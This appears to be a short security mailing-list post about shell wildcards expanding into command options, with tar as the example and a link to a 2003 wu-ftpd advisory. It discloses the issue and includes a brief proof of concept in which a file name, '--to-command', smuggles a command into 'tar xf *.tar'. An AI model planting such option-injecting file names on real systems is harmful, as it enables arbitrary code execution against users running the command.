Shell wildcards considered dangerous?

[Georgi Guninski <gguninski () gmail com>]

Remote version of this affects wu-ftpd from 2003:
https://www.debian.org/security/2003/dsa-377

Summary:  For trusted command PROGRAM, executing
PROGRAM *.EXT
may lead to arbitrary code execution, e.g. for
PROGRAM=EXT=tar

The main idea is the wildcard to add program options.

Open problem:

Are popular programs other than tar vulnerable?

Since shell wildcards are unlikely to change, should best practice
include not using *.EXT in shell?


Example exploit vector: starting program in untrusted
directories.

Poc:
====
$rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : >  --to-command="yes .tar"

#end creating, starts PoC
tar xf *.tar

#.tar (repeats)
====


-- 
CV:    https://j.ludost.net/resumegg.pdf
site:  http://www.guninski.com
blog:  https://j.ludost.net/blog